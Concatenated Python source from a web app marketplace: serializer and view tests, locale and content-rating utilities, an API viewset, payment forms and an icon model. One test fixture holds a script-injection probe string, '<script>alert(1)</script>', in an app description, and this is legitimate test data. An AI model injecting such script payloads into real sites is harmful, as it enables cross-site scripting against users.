        self.app._upsell_from.create(premium=upsell)
        res = self.serialize(self.app)
        eq_(res['upsell']['id'], upsell.id)
        eq_(res['upsell']['app_slug'], upsell.app_slug)
        eq_(res['upsell']['name'], upsell.name)
        eq_(res['upsell']['icon_url'], upsell.get_icon_url(128))
        self.assertApiUrlEqual(res['upsell']['resource_uri'],
                               '/apps/app/%s/' % upsell.id)
    def test_upsell_not_public(self):
        self.request.REGION = mkt.regions.US
        upsell = amo.tests.app_factory(disabled_by_user=True)
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        res = self.serialize(self.app)
        eq_(res['upsell'], False)
    def test_upsell_excluded_from_region(self):
        self.request.REGION = mkt.regions.US
        upsell = amo.tests.app_factory()
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        upsell.addonexcludedregion.create(region=mkt.regions.US.id)
        res = self.serialize(self.app)
        eq_(res['upsell'], False)
    def test_upsell_region_without_payments(self):
        upsell = amo.tests.app_factory()
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        # Serialize from a region the upsell is excluded from.
        region_id = list(upsell.get_excluded_region_ids())[0]
        self.request.REGION = mkt.regions.REGIONS_CHOICES_ID[region_id][1]
        res = self.serialize(self.app)
        eq_(res['upsell'], False)
class TestAppSerializerPrices(amo.tests.TestCase):
    """Tests for how AppSerializer renders price/price_locale/
    payment_required for premium apps across regions and locales."""
    fixtures = fixture('user_2519')
    def setUp(self):
        self.app = amo.tests.app_factory(premium_type=amo.ADDON_PREMIUM)
        self.profile = UserProfile.objects.get(pk=2519)
        self.create_flag('override-app-purchase', everyone=True)
        self.request = RequestFactory().get('/')
    def serialize(self, app, profile=None, region=None, request=None):
        # Serialize `app` for the given region; always acts as self.profile.
        if request is None:
            request = self.request
        request.amo_user = self.profile
        request.REGION = region
        a = AppSerializer(instance=app, context={'request': request})
        return a.data
    def test_some_price(self):
        self.make_premium(self.app, price='0.99')
        res = self.serialize(self.app, region=regions.US)
        eq_(res['price'], Decimal('0.99'))
        eq_(res['price_locale'], '$0.99')
        eq_(res['payment_required'], True)
    def test_no_charge(self):
        # A 0.00 tier is "free with in-app payments": no payment required.
        self.make_premium(self.app, price='0.00')
        res = self.serialize(self.app, region=regions.US)
        eq_(res['price'], Decimal('0.00'))
        eq_(res['price_locale'], '$0.00')
        eq_(res['payment_required'], False)
    def test_wrong_region(self):
        # No price is serialized for a region without a matching currency,
        # but the app still requires payment.
        self.make_premium(self.app, price='0.99')
        res = self.serialize(self.app, region=regions.PL)
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
        eq_(res['payment_required'], True)
    def test_with_locale(self):
        # Regional currency plus active locale drive price formatting.
        premium = self.make_premium(self.app, price='0.99')
        PriceCurrency.objects.create(region=regions.PL.id, currency='PLN',
                                     price='5.01', tier=premium.price,
                                     provider=1)
        with self.activate(locale='fr'):
            res = self.serialize(self.app, region=regions.PL)
            eq_(res['price'], Decimal('5.01'))
            eq_(res['price_locale'], u'5,01\xa0PLN')
    def test_missing_price(self):
        # Premium app whose tier was removed: no price data at all.
        premium = self.make_premium(self.app, price='0.99')
        premium.price = None
        premium.save()
        res = self.serialize(self.app)
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
    def test_cannot_purchase(self):
        self.make_premium(self.app, price='0.99')
        res = self.serialize(self.app, region=regions.UK)
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
        eq_(res['payment_required'], True)
    # NOTE(review): this test is byte-for-byte identical to
    # test_cannot_purchase above; presumably one of the two was meant to
    # exercise the 'override-app-purchase' flag path -- confirm intent.
    def test_can_purchase(self):
        self.make_premium(self.app, price='0.99')
        res = self.serialize(self.app, region=regions.UK)
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
        eq_(res['payment_required'], True)
@mock.patch('versions.models.Version.is_privileged', False)
class TestESAppToDict(amo.tests.ESTestCase):
    """Tests for ESAppSerializer: serializing an app from the ES index.

    Each mutating test saves the app and calls self.refresh('webapp') so the
    Elasticsearch document is re-indexed before serializing.
    """
    fixtures = fixture('user_2519', 'webapp_337141')
    def setUp(self):
        self.create_switch('iarc')
        self.profile = UserProfile.objects.get(pk=2519)
        self.request = RequestFactory().get('/')
        self.request.REGION = mkt.regions.US
        self.request.amo_user = self.profile
        self.app = Webapp.objects.get(pk=337141)
        self.version = self.app.current_version
        self.category = Category.objects.create(name='cattest', slug='testcat',
                                                type=amo.ADDON_WEBAPP)
        AddonCategory.objects.create(addon=self.app, category=self.category)
        self.preview = Preview.objects.create(filetype='image/png',
                                              addon=self.app, position=0)
        self.app.description = {
            'en-US': u'XSS attempt <script>alert(1)</script>',
            'fr': u'Déscriptîon in frènch'
        }
        self.app.save()
        self.refresh('webapp')
    def get_obj(self):
        """Fetch the app's document back out of the ES index."""
        return S(WebappIndexer).filter(id=self.app.pk).execute().objects[0]
    def serialize(self):
        """Serialize the indexed document with ESAppSerializer."""
        serializer = ESAppSerializer(instance=self.get_obj(),
                                     context={'request': self.request})
        return serializer.data
    def test_basic(self):
        """Full-field snapshot of the serialized output."""
        res = self.serialize()
        expected = {
            'absolute_url': 'http://testserver/app/something-something/',
            'app_type': 'hosted',
            'author': 'Mozilla Tester',
            'banner_regions': [],
            'categories': [self.category.slug],
            'created': self.app.created,
            'current_version': '1.0',
            'default_locale': u'en-US',
            'description': {
                'en-US': u'XSS attempt <script>alert(1)</script>',
                'fr': u'Déscriptîon in frènch'
            },
            'device_types': [],
            'homepage': None,
            'icons': dict((size, self.app.get_icon_url(size))
                          for size in (16, 48, 64, 128)),
            'id': 337141,
            'is_offline': False,
            'is_packaged': False,
            'manifest_url': 'http://micropipes.com/temp/steamcube.webapp',
            'name': {u'en-US': u'Something Something Steamcube!',
                     u'es': u'Algo Algo Steamcube!'},
            'payment_required': False,
            'premium_type': 'free',
            'previews': [{'thumbnail_url': self.preview.thumbnail_url,
                          'image_url': self.preview.image_url}],
            'privacy_policy': reverse('app-privacy-policy-detail',
                                      kwargs={'pk': self.app.id}),
            'public_stats': False,
            'ratings': {
                'average': 0.0,
                'count': 0,
            },
            'reviewed': self.version.reviewed,
            'slug': 'something-something',
            'status': 4,
            'support_email': None,
            'support_url': None,
            'supported_locales': [u'en-US', u'es', u'pt-BR'],
            'upsell': False,
            # 'version's handled below to support API URL assertions.
            'weekly_downloads': None,
        }
        if self.request.amo_user:
            # The 'user' sub-object only appears for authenticated requests.
            expected['user'] = {
                'developed': False,
                'installed': False,
                'purchased': False,
            }
        ok_('1.0' in res['versions'])
        self.assertApiUrlEqual(res['versions']['1.0'],
                               '/apps/versions/1268829/')
        for k, v in expected.items():
            eq_(res[k], v,
                u'Expected value "%s" for field "%s", got "%s"' %
                (v, k, res[k]))
    def test_regions(self):
        """Serialized region slugs match the app's own region list."""
        res = self.serialize()
        self.assertSetEqual([region['slug'] for region in res['regions']],
                            [region.slug for region in self.app.get_regions()])
    def test_basic_no_queries(self):
        # If we don't pass a UserProfile, a free app shouldn't have to make any
        # db queries at all.
        self.request.amo_user = None
        with self.assertNumQueries(0):
            self.test_basic()
    def test_basic_with_lang(self):
        # Check that when ?lang is passed, we get the right language and we get
        # empty strings instead of None if the strings don't exist.
        self.request = RequestFactory().get('/?lang=es')
        self.request.REGION = mkt.regions.US
        res = self.serialize()
        expected = {
            'id': 337141,
            'description': u'XSS attempt <script>alert(1)</script>',
            'homepage': None,
            'name': u'Algo Algo Steamcube!',
            'support_email': None,
            'support_url': None,
        }
        for k, v in expected.items():
            eq_(res[k], v,
                u'Expected value "%s" for field "%s", got "%s"' %
                (v, k, res[k]))
    def test_content_ratings(self):
        """Ratings/descriptors/interactives serialize per request region."""
        self.app.set_content_ratings({
            ratingsbodies.CLASSIND: ratingsbodies.CLASSIND_18,
            ratingsbodies.GENERIC: ratingsbodies.GENERIC_18,
        })
        self.app.set_descriptors(['has_generic_violence', 'has_generic_scary',
                                  'has_classind_shocking'])
        self.app.set_interactives(['has_digital_purchases', 'has_shares_info'])
        self.app.save()
        self.refresh('webapp')
        # A region without its own ratings body falls back to GENERIC.
        self.request.REGION = mkt.regions.ME
        res = self.serialize()
        eq_(res['content_ratings']['body'], 'generic')
        eq_(res['content_ratings']['rating'], '18')
        self.assertSetEqual(
            res['content_ratings']['descriptors'],
            ['violence', 'scary'])
        self.assertSetEqual(
            res['content_ratings']['interactives'],
            ['digital-purchases', 'shares-info'])
        # Brazil uses its own CLASSIND body and descriptors.
        self.request.REGION = mkt.regions.BR
        res = self.serialize()
        eq_(res['content_ratings']['body'], 'classind')
        eq_(res['content_ratings']['rating'], '18')
        self.assertSetEqual(
            res['content_ratings']['descriptors'],
            ['shocking'])
    def test_show_downloads_count(self):
        """Show weekly_downloads in results if app stats are public."""
        self.app.update(public_stats=True)
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['weekly_downloads'], 9999)
    def test_devices(self):
        """Associated device types appear as their API slugs."""
        AddonDeviceType.objects.create(addon=self.app,
                                       device_type=amo.DEVICE_GAIA.id)
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['device_types'], ['firefoxos'])
    def test_user(self):
        """The 'user' sub-object reflects the requesting user's relations."""
        self.app.addonuser_set.create(user=self.profile)
        self.profile.installed_set.create(addon=self.app)
        self.app.addonpurchase_set.create(user=self.profile)
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['user'],
            {'developed': True, 'installed': True, 'purchased': True})
    def test_user_not_mine(self):
        """Relations belonging to another user don't leak into 'user'."""
        self.app.addonuser_set.create(user_id=31337)
        Installed.objects.create(addon=self.app, user_id=31337)
        self.app.addonpurchase_set.create(user_id=31337)
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['user'],
            {'developed': False, 'installed': False, 'purchased': False})
    def test_no_price(self):
        res = self.serialize()
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
    def test_has_price(self):
        self.make_premium(self.app)
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['price'], Decimal('1.00'))
        eq_(res['price_locale'], '$1.00')
        eq_(res['payment_required'], True)
    def test_not_paid(self):
        # Currencies flagged as not accepting payment hide the price.
        self.make_premium(self.app)
        PriceCurrency.objects.update(paid=False)
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
    def test_no_currency(self):
        # No PriceCurrency rows at all: price can't be resolved.
        self.make_premium(self.app)
        PriceCurrency.objects.all().delete()
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['price'], None)
        eq_(res['price_locale'], None)
    def test_no_payment_account(self):
        eq_(self.serialize()['payment_account'], None)
    def test_payment_account(self):
        """A configured payment account serializes as its API detail URL."""
        self.make_premium(self.app)
        seller = SolitudeSeller.objects.create(
            resource_uri='/path/to/sel', uuid='seller-id', user=self.profile)
        account = PaymentAccount.objects.create(
            user=self.profile, uri='asdf', name='test', inactive=False,
            solitude_seller=seller, account_id=123)
        AddonPaymentAccount.objects.create(
            addon=self.app, account_uri='foo', payment_account=account,
            product_uri='bpruri')
        self.app.save()
        self.refresh('webapp')
        eq_(self.serialize()['payment_account'],
            reverse('payment-account-detail', kwargs={'pk': account.pk}))
    def test_release_notes(self):
        """Release notes: None when absent, translations dict, or a plain
        string when a ?lang= is requested."""
        res = self.serialize()
        eq_(res['release_notes'], None)
        version = self.app.current_version
        version.releasenotes = u'These are nötes.'
        version.save()
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['release_notes'], {u'en-US': unicode(version.releasenotes)})
        self.request = RequestFactory().get('/?lang=whatever')
        self.request.REGION = mkt.regions.US
        res = self.serialize()
        eq_(res['release_notes'], unicode(version.releasenotes))
    def test_upsell(self):
        upsell = amo.tests.app_factory()
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['upsell']['id'], upsell.id)
        eq_(res['upsell']['app_slug'], upsell.app_slug)
        eq_(res['upsell']['name'], upsell.name)
        eq_(res['upsell']['icon_url'], upsell.get_icon_url(128))
        self.assertApiUrlEqual(res['upsell']['resource_uri'],
                               '/apps/app/%s/' % upsell.id)
    def test_upsell_not_public(self):
        # A disabled upsell app must not be exposed.
        upsell = amo.tests.app_factory(disabled_by_user=True)
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['upsell'], False)
    def test_upsell_is_made_public_later(self):
        upsell = amo.tests.app_factory(status=amo.STATUS_PENDING)
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        # Don't use .reload() because it doesn't reset cached_property.
        upsell = Webapp.objects.get(pk=upsell.pk)
        upsell.update(status=amo.STATUS_PUBLIC)
        # Note that we shouldn't have to call self.app.save(), because saving
        # the upsell should have triggered the reindex of self.app.
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['upsell']['id'], upsell.id)
        eq_(res['upsell']['app_slug'], upsell.app_slug)
        eq_(res['upsell']['name'], upsell.name)
        eq_(res['upsell']['icon_url'], upsell.get_icon_url(128))
        self.assertApiUrlEqual(res['upsell']['resource_uri'],
                               '/apps/app/%s/' % upsell.id)
    def test_upsell_excluded_from_region(self):
        # Upsell excluded from the request region must not be exposed.
        upsell = amo.tests.app_factory()
        upsell.addonexcludedregion.create(region=mkt.regions.US.id)
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['upsell'], False)
    def test_upsell_region_without_payments(self):
        """Upsell hidden when serving a region where it can't be bought."""
        upsell = amo.tests.app_factory()
        self.make_premium(upsell)
        self.app._upsell_from.create(premium=upsell)
        self.refresh('webapp')
        region_id = list(upsell.get_excluded_region_ids())[0]
        region = mkt.regions.REGIONS_CHOICES_ID[region_id][1]
        self.request.REGION = region
        res = self.serialize()
        eq_(res['upsell'], False)
    def test_developer_name_empty(self):
        """Blank developer name and unlisted authors yield an empty author."""
        self.app.current_version.update(_developer_name='')
        self.app.addonuser_set.update(listed=False)
        self.app.save()
        self.refresh('webapp')
        res = self.serialize()
        eq_(res['author'], '')
class TestSupportedLocales(amo.tests.TestCase):
    """Tests for get_supported_locales() manifest parsing."""
    def setUp(self):
        self.manifest = {'default_locale': 'en'}
    def check(self, expected):
        # Helper: compare parsed locales against the expected list.
        eq_(get_supported_locales(self.manifest), expected)
    def test_empty_locale(self):
        self.check([])
    def test_single_locale(self):
        self.manifest.update({'locales': {'es': {'name': 'eso'}}})
        self.check(['es'])
    def test_multiple_locales(self):
        self.manifest.update({'locales': {'es': {'name': 'si'},
                                          'fr': {'name': 'oui'}}})
        self.check(['es', 'fr'])
    def test_short_locale(self):
        # Short codes (SHORTER_LANGUAGES) expand to their full locale.
        self.manifest.update({'locales': {'pt': {'name': 'sim'}}})
        self.check(['pt-PT'])
    def test_unsupported_locale(self):
        # Locales not in AMO_LANGUAGES are dropped entirely.
        self.manifest.update({'locales': {'xx': {'name': 'xx'}}})
        self.check([])
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo.tests
from constants.payments import PROVIDER_BANGO, PROVIDER_REFERENCE
from mkt.api.tests.test_oauth import BaseOAuth
from mkt.constants import APP_FEATURES
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.webapps.serializers import (AppSerializer, AppFeaturesSerializer,
SimpleAppSerializer)
from users.models import UserProfile
class TestAppFeaturesSerializer(BaseOAuth):
    """Tests for AppFeaturesSerializer's 'required' feature list."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        self.features = Webapp.objects.get(pk=337141).latest_version.features
        self.request = RequestFactory().get('/')
    def get_native(self, **kwargs):
        # Helper: flip feature flags on the version then serialize.
        self.features.update(**kwargs)
        return AppFeaturesSerializer().to_native(self.features)
    def test_no_features(self):
        native = self.get_native()
        ok_(not native['required'])
    def test_one_feature(self):
        native = self.get_native(has_pay=True)
        self.assertSetEqual(native['required'], ['pay'])
    def test_all_features(self):
        # Enable every known feature flag ('has_<feature>').
        data = dict(('has_' + f.lower(), True) for f in APP_FEATURES)
        native = self.get_native(**data)
        self.assertSetEqual(native['required'],
                            [f.lower() for f in APP_FEATURES])
class TestSimpleAppSerializer(amo.tests.TestCase):
    """Tests for AppSerializer/SimpleAppSerializer region and payment
    account fields."""
    fixtures = fixture('webapp_337141')
    def setUp(self):
        self.webapp = Webapp.objects.get(pk=337141)
        self.request = RequestFactory().get('/')
    def app(self):
        return AppSerializer(self.webapp,
                             context={'request': self.request})
    def simple_app(self):
        return SimpleAppSerializer(self.webapp,
                                   context={'request': self.request})
    def add_pay_account(self, provider=PROVIDER_BANGO):
        # Helper: attach a payment account (default: Bango) to the app.
        user = UserProfile.objects.create(email='a', username='b')
        acct = PaymentAccount.objects.create(
            solitude_seller=SolitudeSeller.objects.create(user=user),
            provider=provider, user=user)
        AddonPaymentAccount.objects.create(addon=self.webapp,
                                           payment_account=acct)
        return acct
    def test_regions_present(self):
        # Regression test for bug 964802.
        data = self.simple_app().data
        ok_('regions' in data)
        eq_(len(data['regions']), len(self.webapp.get_regions()))
    def test_no_payment_account_when_not_premium(self):
        eq_(self.app().data['payment_account'], None)
    def test_no_payment_account(self):
        self.make_premium(self.webapp)
        eq_(self.app().data['payment_account'], None)
    def test_no_bango_account(self):
        # Only Bango accounts are exposed; other providers serialize None.
        self.make_premium(self.webapp)
        self.add_pay_account(provider=PROVIDER_REFERENCE)
        eq_(self.app().data['payment_account'], None)
    def test_payment_account(self):
        self.make_premium(self.webapp)
        acct = self.add_pay_account()
        eq_(self.app().data['payment_account'],
            reverse('payment-account-detail', args=[acct.pk]))
########NEW FILE########
__FILENAME__ = utils
# -*- coding: utf-8 -*-
from collections import defaultdict
import commonware.log
from amo.utils import find_language
import lib.iarc
import mkt
log = commonware.log.getLogger('z.webapps')
def get_locale_properties(manifest, property, default_locale=None):
    """Collect per-locale values of *property* from a webapp manifest.

    Returns a dict mapping each locale under the manifest's ``locales``
    section that defines *property* to its value.  If a default locale is
    known (from the manifest or the *default_locale* fallback) and the
    manifest has a root-level value for *property*, that value is stored
    under the default locale's key as well.
    """
    locales = manifest.get('locales', {})
    locale_dict = dict((loc, props[property])
                       for loc, props in locales.items()
                       if property in props)
    # The root-level value belongs to the default locale, when one exists.
    default = manifest.get('default_locale') or default_locale
    root_value = manifest.get(property)
    if default and root_value:
        locale_dict[default] = root_value
    return locale_dict
def get_supported_locales(manifest):
    """
    Returns a list of locales found in the "locales" property of the manifest.
    This will convert locales found in the SHORTER_LANGUAGES setting to their
    full locale. It will also remove locales not found in AMO_LANGUAGES.
    Note: The default_locale is not included.
    """
    declared = set(manifest.get('locales', {}))
    # find_language() maps short codes to full locales and returns a falsy
    # value for locales we don't support, which are filtered out here.
    resolved = (find_language(locale) for locale in declared)
    return sorted(lang for lang in resolved if lang)
def dehydrate_content_rating(rating):
    """
    {body.id, rating.id} to translated rating.label.

    *rating* is a dict with 'body' and 'rating' IDs as stored in ES.
    Returns the translated label of the matching rating, or {} when the
    stored value is in the legacy (non-ID) ES format.
    """
    try:
        body = mkt.ratingsbodies.dehydrate_ratings_body(
            mkt.ratingsbodies.RATINGS_BODIES[int(rating['body'])])
    except TypeError:
        # Legacy ES format (bug 943371).
        return {}
    # Resolve the rating ID within that body's ratings list.
    rating = mkt.ratingsbodies.dehydrate_rating(
        body.ratings[int(rating['rating'])])
    return rating.label
def dehydrate_content_ratings(content_ratings):
    """Replace each rating entry (IDs) with its translated label, in place.

    *content_ratings* maps a ratings-body key to a {body, rating} ID pair;
    every value is run through dehydrate_content_rating().  The mapping is
    mutated and returned; a falsy input is returned unchanged.
    """
    if content_ratings:
        for body_key in list(content_ratings):
            content_ratings[body_key] = dehydrate_content_rating(
                content_ratings[body_key])
    return content_ratings
def dehydrate_descriptors(keys, body=None):
    """
    Convert rating-descriptor keys to lists of descriptor slugs grouped by
    ratings body.

    ['ESRB_BLOOD', ...] to {'esrb': ['blood'], ...}.

    Keys not present in RATING_DESCS are skipped.

    The *body* parameter is unused; it is kept only for backward
    compatibility with existing callers.
    """
    results = defaultdict(list)
    for key in keys:
        if mkt.ratingdescriptors.RATING_DESCS.get(key):
            # Slugify, then split off the ratings-body prefix
            # (e.g. 'esrb-blood' -> body 'esrb', label 'blood').
            # Use a dedicated name so we don't clobber the `body` parameter,
            # which the previous version silently shadowed.
            body_slug, label = key.lower().replace('_', '-').split('-', 1)
            results[body_slug].append(label)
    return dict(results)
def dehydrate_interactives(keys):
    """
    Convert interactive-element keys to a list of slugs.

    ['SOCIAL_NETWORKING', ...] to ['social-networking', ...].
    Keys missing from RATING_INTERACTIVES are dropped.
    """
    known = mkt.ratinginteractives.RATING_INTERACTIVES
    return [key.lower().replace('_', '-')
            for key in keys if known.get(key)]
def iarc_get_app_info(app):
    """Fetch IARC rating info for *app* via the IARC web service.

    Uses the app's stored IARC submission id and security code to build the
    Get_App_Info request, then parses the XML response into a dict.
    """
    client = lib.iarc.client.get_iarc_client('services')
    iarc = app.iarc_info
    iarc_id = iarc.submission_id
    iarc_code = iarc.security_code
    # Generate XML.
    xml = lib.iarc.utils.render_xml(
        'get_app_info.xml',
        {'submission_id': iarc_id, 'security_code': iarc_code})
    # Process that shizzle.
    resp = client.Get_App_Info(XMLString=xml)
    # Handle response.
    return lib.iarc.utils.IARC_XML_Parser().parse_string(resp)
########NEW FILE########
__FILENAME__ = views
from django import forms as django_forms
from django.core.urlresolvers import reverse
from django.http import Http404
import commonware
from rest_framework import exceptions, response, serializers, status, viewsets
from rest_framework.decorators import action
from rest_framework.response import Response
import amo
from addons.models import AddonUser
from files.models import FileUpload, Platform
from lib.metrics import record_action
from mkt.api.authentication import (RestAnonymousAuthentication,
RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import (AllowAppOwner, AllowReadOnlyIfPublic,
AllowReviewerReadOnly, AnyOf)
from mkt.api.base import CORSMixin, MarketplaceView, SlugOrIdMixin
from mkt.api.exceptions import HttpLegallyUnavailable
from mkt.api.forms import IconJSONForm
from mkt.developers import tasks
from mkt.developers.forms import AppFormMedia, IARCGetAppInfoForm
from mkt.regions import get_region
from mkt.submit.views import PreviewViewSet
from mkt.webapps.serializers import AppSerializer
from mkt.webapps.models import get_excluded_in, Webapp
log = commonware.log.getLogger('z.api')
class AppViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
                 viewsets.ModelViewSet):
    """REST API viewset for Webapp objects (lookup by pk or app_slug).

    Readable by owners, reviewers, or anyone for public apps; writable by
    owners only.  Listing is restricted to the authenticated user's apps.
    """
    serializer_class = AppSerializer
    slug_field = 'app_slug'
    cors_allowed_methods = ('get', 'put', 'post', 'delete')
    permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
                                AllowReadOnlyIfPublic)]
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    def get_queryset(self):
        """Apps visible in the request's region (region exclusions applied)."""
        return Webapp.objects.all().exclude(
            id__in=get_excluded_in(get_region().id))
    def get_base_queryset(self):
        """All apps, ignoring region exclusions."""
        return Webapp.objects.all()
    def get_object(self, queryset=None):
        """Region-aware lookup.

        If the app is excluded from the request's region, owners/reviewers
        still get it; everyone else receives a 'legally unavailable'
        response carrying a few descriptive fields.
        """
        try:
            app = super(AppViewSet, self).get_object()
        except Http404:
            # Not in this region's queryset; retry without region filtering.
            app = super(AppViewSet, self).get_object(self.get_base_queryset())
            # Owners and reviewers can see apps regardless of region.
            owner_or_reviewer = AnyOf(AllowAppOwner, AllowReviewerReadOnly)
            if owner_or_reviewer.has_object_permission(self.request, self,
                                                       app):
                return app
            data = {}
            for key in ('name', 'support_email', 'support_url'):
                value = getattr(app, key)
                data[key] = unicode(value) if value else ''
            data['reason'] = 'Not available in your region.'
            raise HttpLegallyUnavailable(data)
        self.check_object_permissions(self.request, app)
        return app
    def create(self, request, *args, **kwargs):
        """Create an app from a validated upload (packaged) or manifest
        (hosted), owned by the requesting user."""
        uuid = request.DATA.get('upload', '')
        if uuid:
            is_packaged = True
        else:
            uuid = request.DATA.get('manifest', '')
            is_packaged = False
        if not uuid:
            raise serializers.ValidationError(
                'No upload or manifest specified.')
        try:
            upload = FileUpload.objects.get(uuid=uuid)
        except FileUpload.DoesNotExist:
            raise exceptions.ParseError('No upload found.')
        if not upload.valid:
            raise exceptions.ParseError('Upload not valid.')
        if not request.amo_user.read_dev_agreement:
            log.info(u'Attempt to use API without dev agreement: %s'
                     % request.amo_user.pk)
            raise exceptions.PermissionDenied('Terms of Service not accepted.')
        if not (upload.user and upload.user.pk == request.amo_user.pk):
            raise exceptions.PermissionDenied('You do not own that app.')
        plats = [Platform.objects.get(id=amo.PLATFORM_ALL.id)]
        # Create app, user and fetch the icon.
        obj = Webapp.from_upload(upload, plats, is_packaged=is_packaged)
        AddonUser(addon=obj, user=request.amo_user).save()
        tasks.fetch_icon.delay(obj)
        record_action('app-submitted', request, {'app-id': obj.pk})
        log.info('App created: %s' % obj.pk)
        data = AppSerializer(
            context=self.get_serializer_context()).to_native(obj)
        return response.Response(
            data, status=201,
            headers={'Location': reverse('app-detail', kwargs={'pk': obj.pk})})
    def update(self, request, *args, **kwargs):
        # Fail if the app doesn't exist yet.
        self.get_object()
        r = super(AppViewSet, self).update(request, *args, **kwargs)
        # Be compatible with tastypie responses.
        if r.status_code == 200:
            r.status_code = 202
        return r
    def list(self, request, *args, **kwargs):
        """List only the authenticated user's own apps (paginated)."""
        if not request.amo_user:
            log.info('Anonymous listing not allowed')
            raise exceptions.PermissionDenied('Anonymous listing not allowed.')
        self.object_list = self.filter_queryset(self.get_queryset().filter(
            authors=request.amo_user))
        page = self.paginate_queryset(self.object_list)
        serializer = self.get_pagination_serializer(page)
        return response.Response(serializer.data)
    def partial_update(self, request, *args, **kwargs):
        # PATCH is deliberately unsupported; clients must PUT full objects.
        raise exceptions.MethodNotAllowed('PATCH')
    @action()
    def content_ratings(self, request, *args, **kwargs):
        """Kick off an IARC content-rating request for the app."""
        app = self.get_object()
        form = IARCGetAppInfoForm(data=request.DATA, app=app)
        if form.is_valid():
            try:
                form.save(app)
                return Response(status=status.HTTP_201_CREATED)
            except django_forms.ValidationError:
                # Fall through to the 400 response below with form errors.
                pass
        return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
    @action(methods=['POST'],
            cors_allowed_methods=PreviewViewSet.cors_allowed_methods)
    def preview(self, request, *args, **kwargs):
        """Delegate preview creation to PreviewViewSet for this app."""
        kwargs['app'] = self.get_object()
        view = PreviewViewSet.as_view({'post': '_create'})
        return view(request, *args, **kwargs)
    @action(methods=['PUT'], cors_allowed_methods=['put'])
    def icon(self, request, *args, **kwargs):
        """Replace the app's icon from JSON-encoded image data."""
        app = self.get_object()
        data_form = IconJSONForm(request.DATA)
        if not data_form.is_valid():
            return Response(data_form.errors,
                            status=status.HTTP_400_BAD_REQUEST)
        form = AppFormMedia(data_form.cleaned_data, request=request)
        if not form.is_valid():
            return Response(data_form.errors,
                            status=status.HTTP_400_BAD_REQUEST)
        form.save(app)
        return Response(status=status.HTTP_200_OK)
class PrivacyPolicyViewSet(CORSMixin, SlugOrIdMixin, MarketplaceView,
                           viewsets.GenericViewSet):
    """Read-only endpoint exposing an app's privacy policy text."""
    queryset = Webapp.objects.all()
    cors_allowed_methods = ('get',)
    permission_classes = [AnyOf(AllowAppOwner, AllowReviewerReadOnly,
                                AllowReadOnlyIfPublic)]
    slug_field = 'app_slug'
    authentication_classes = [RestOAuthAuthentication,
                              RestSharedSecretAuthentication,
                              RestAnonymousAuthentication]
    def retrieve(self, request, *args, **kwargs):
        """Return {'privacy_policy': <text>} for the requested app."""
        app = self.get_object()
        return response.Response(
            {'privacy_policy': unicode(app.privacy_policy)},
            content_type='application/json')
########NEW FILE########
__FILENAME__ = forms
from django import forms
import happyforms
from mkt.api.forms import SluggableModelChoiceField
from mkt.inapp.models import InAppProduct
from mkt.webapps.models import Webapp
class PrepareWebAppForm(happyforms.Form):
    """Validates the app a webpay purchase is being prepared for."""
    # Accepts either a pk or an app_slug value.
    app = SluggableModelChoiceField(queryset=Webapp.objects.valid(),
                                    sluggable_to_field_name='app_slug')
class PrepareInAppForm(happyforms.Form):
    """Validates the in-app product a webpay purchase is prepared for."""
    inapp = forms.ModelChoiceField(queryset=InAppProduct.objects.all())
class FailureForm(happyforms.Form):
    """Payload for webpay failure notifications: the failing URL and how
    many attempts were made."""
    url = forms.CharField()
    attempts = forms.IntegerField()
########NEW FILE########
__FILENAME__ = models
import os
from django.conf import settings
from django.db import models
from amo.helpers import absolutify
from amo.models import ModelBase
class ProductIcon(ModelBase):
    """Locally cached copy of an externally-hosted product icon.

    Icons are fetched from ext_url by the webpay tasks and stored under
    PRODUCT_ICON_PATH so payment pages never hot-link third-party images.
    """
    # Original (external) URL the icon was fetched from.
    ext_url = models.CharField(max_length=255, db_index=True, unique=True)
    # Height/width of square icon as declared in JWT.
    ext_size = models.IntegerField(db_index=True)
    # Height/width of local icon after cache.
    size = models.IntegerField(db_index=True)
    # Image format as told by PIL.
    format = models.CharField(max_length=4)

    def storage_path(self):
        """Relative storage path of the cached icon file."""
        return os.path.join(settings.PRODUCT_ICON_PATH, self._base_path())

    def url(self):
        """Absolute public URL of the cached icon."""
        return absolutify(os.path.join(settings.PRODUCT_ICON_URL,
                                       self._base_path()))

    def _base_path(self):
        """'<pk//1000>/<pk>.<ext>' path component shared by path and URL."""
        ext = self.format.lower()
        if ext == 'jpeg':
